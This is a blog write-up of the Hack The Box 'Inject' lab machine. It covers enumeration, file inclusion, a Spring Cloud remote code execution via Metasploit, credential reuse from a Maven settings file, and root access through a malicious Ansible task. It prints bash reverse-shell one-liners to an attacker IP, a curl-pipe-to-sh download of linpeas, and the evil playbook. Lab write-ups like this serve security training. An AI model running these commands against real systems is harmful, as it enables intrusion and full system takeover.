Hack The Box | Inject | Write Up

PĂșblicado en por

Just tackled the ‘Inject’ machine on #HackTheBox. Loved the exploration of high ports and the challenge of the injection exploitation! If you’re into #CTF, this is a must try! 🚀 #CyberSecurity #PenTesting #EthicalHacking #InfoSec

The first step we will do is perform our Nmap scan:

└─$ sudo nmap -sT -n -Pn -sV -T4 -vv 10.10.11.204
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see some interesting information. We have found the port “8080” with the service “Nagios NSCA”. In this point we can try to search more information about this service. Let’s check with our navigator this application:

We can see is a kind of application to give us a storage service. However, we can see more information in this application:

In the blog section, we can see two possible user “admin” and “Brandon Auger”. Let’s see more parts of the application:

We have found “Upload files” function, might be it is a way to exploit some reverse shell. Also, we can found another function in this site about “Sign Up” button:

We can try to enumerate more directories with “ffuf”:

sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u <http://10.10.11.204:8080/FUZZ> -v
[Status: 200, Size: 5371, Words: 1861, Lines: 113, Duration: 90ms]
| URL | <http://10.10.11.204:8080/blogs>
    * FUZZ: blogs

[Status: 500, Size: 106, Words: 3, Lines: 1, Duration: 432ms]
| URL | <http://10.10.11.204:8080/error>
    * FUZZ: error

[Status: 500, Size: 712, Words: 27, Lines: 1, Duration: 481ms]
| URL | <http://10.10.11.204:8080/environment>
    * FUZZ: environment

[Status: 200, Size: 5654, Words: 1053, Lines: 104, Duration: 193ms]
| URL | <http://10.10.11.204:8080/register>
    * FUZZ: register

[Status: 200, Size: 1857, Words: 513, Lines: 54, Duration: 33ms]
| URL | <http://10.10.11.204:8080/upload>
    * FUZZ: upload

Apparently, we don’t found more directories. We will try to upload some file through the functionality discovered and then capture the request with our burp suite:

Let’s try to upload a “jpeg” file. We will see our request in burp suite:

Before upload the “jpeg” file I have tried some files but it didn’t works. After forward our request we will see the response and finally discover something interesting:

We have found the function that the application use to show us our uploaded files:

Now, we will try to upload some reverse shell and modify through burp suite our request to bypass the restrictions. First, we will need to turn on our listen server with netcat:

sudo nc -nlvp 4444

Now, we will create a new file with this content:

sh -i >& /dev/tcp/10.10.16.38/4444 0>&1

Now, we will try to upload this file but we will need to modify our request with burp suite (extension of the file):

But apparently is not working:

If we analyzing the url we can see that probable we can exploit it with file inclusion:

We can see the application is vulnerable to file inclusion. Let’s see if we can check “/etc/passwd” file:

We have discovered the users “frank” and “phil”. We need to enumerate more, let’s see what we can found. If we still searching through the different directories we will see the file “pom.xml”:

This file give us a lot of information but we can see something interesting and is the technology that’s using “org.springframework.cloud”. After receive this information we can search if exists some exploit for this technology:

└─$ searchsploit spring cloud
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)                                                                                                                                                   | java/webapps/46772.rb
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)                                                                                                                                                   | java/webapps/46772.rb
Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)                                                                                                                                                  | java/webapps/50799.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

However, if we search in metasploit the function that already we have found we will see this exploit:

After configure this exploit, we will can exploit the vulnerability:

We will check some information into our meterpreter session:

meterpreter > sysinfo
Computer     : 10.10.11.204
OS           : Ubuntu 20.04 (Linux 5.4.0-144-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: frank

No we have access to this machine through the user “frank”. Let’s see if we can execute one shell to search more information in this machine:

meterpreter > shell
Process 8848 created.
Channel 1 created.

Now, we already have one shell. In this point we need to enumerate more to try to gain access to the next user because now we don’t have access to reach it. We will found the next file with the “phil” credentials:

pwd
/home/frank/.m2

ls -la
total 12
drwx------ 2 frank frank 4096 Feb  1 18:38 .
drwxr-xr-x 5 frank frank 4096 Feb  1 18:38 ..
-rw-r----- 1 root  frank  617 Jan 31 16:55 settings.xml

cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="<http://maven.apache.org/POM/4.0.0>" xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>"
        xsi:schemaLocation="<http://maven.apache.org/POM/4.0.0> <https://maven.apache.org/xsd/maven-4.0.0.xsd>">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Now, with the new information we can to check if we can approach this function to gain access with the user “phil”:

su phil
Password: DocPhillovestoInject123

We will check our user:

id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Go to the user home:

cd /home/phil/

Check the directory:

ls -la
total 24
drwxr-xr-x 3 phil phil 4096 Feb  1 18:38 .
drwxr-xr-x 4 root root 4096 Feb  1 18:38 ..
lrwxrwxrwx 1 root root    9 Feb  1 07:40 .bash_history -> /dev/null
-rw-r--r-- 1 phil phil 3771 Feb 25  2020 .bashrc
drwx------ 2 phil phil 4096 Feb  1 18:38 .cache
-rw-r--r-- 1 phil phil  807 Feb 25  2020 .profile
-rw-r----- 1 root phil   33 Jun  7 04:47 user.txt

Finally, we can check the user flag:

cat user.txt

Now, in this point, we will improve our shell with python:

python3 -c 'import pty; pty.spawn("/bin/bash")'

We need to enumerate more to try to gain root access. We will to turn on our web server to donwload linpeas in the machine:

sudo python3 -m http.server 80

After that, we will execute linpeas in the machine:

curl <http://10.10.16.38/linpeas.sh> | sh

We have discovered “/tmp/Vodoy” binary process with non ‘root root’ and not belonging to current user:

Let’s enumerate more information about that with the tool “pspy64”:

phil@inject:~$ wget <http://10.10.16.38/pspy64>
phil@inject:~$ chmod +x pspy64
phil@inject:~$ ./pspy64

We will found a lot of ansible processes and automation tasks. Let’s see if we can execute PE through ansible:

Let’s try to do PE with ansible task (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/). We need to go to the directory “/opt/automation/tasks/” because we will create new task. Now, we need to prepare our evil task. Create new file with this content:

- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh

Now, we can download it through our machine:

phil@inject:/opt/automation/tasks$ wget <http://10.10.16.38:8080/evil.yml>

The next step is create the file “/tmp/root.sh” with reverse shell:

echo '/bin/bash -i >& /dev/tcp/10.10.16.38/4422 0>&1' > /tmp/root.sh

Also don’t forget to turn on our netcat server:

└─$ sudo nc -nlvp 4422

Now, we can exploit the vulnerability to gain root access in the machine:

phil@inject:/opt/automation/tasks$ ansible-playbook evil.yml

Now, we will receive the reverse shell with root permissions:

Now we can reach the root flag:

root@inject:/opt/automation/tasks# cd /root/
cd /root/

root@inject:~# ls
playbook_1.yml
root.txt

root@inject:~# cat root.txt
cat root.txt

That’s it for our deep-dive into ‘Inject,’ a true masterclass in understanding and exploiting vulnerabilities in the world of Hack The Box CTF challenges. As we unpacked the twists and turns of enumeration and injection, we’ve gained vital knowledge and new skills, elevating our cybersecurity expertise. Until the next challenge, keep on hacking, keep on learning, and always explore responsibly. Stay tuned for more journeys into the thrilling world of CTF challenges!»

Keep your hacking spirit high and cybersecurity curiosity alive!

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cĂłmo se procesan los datos de tus comentarios.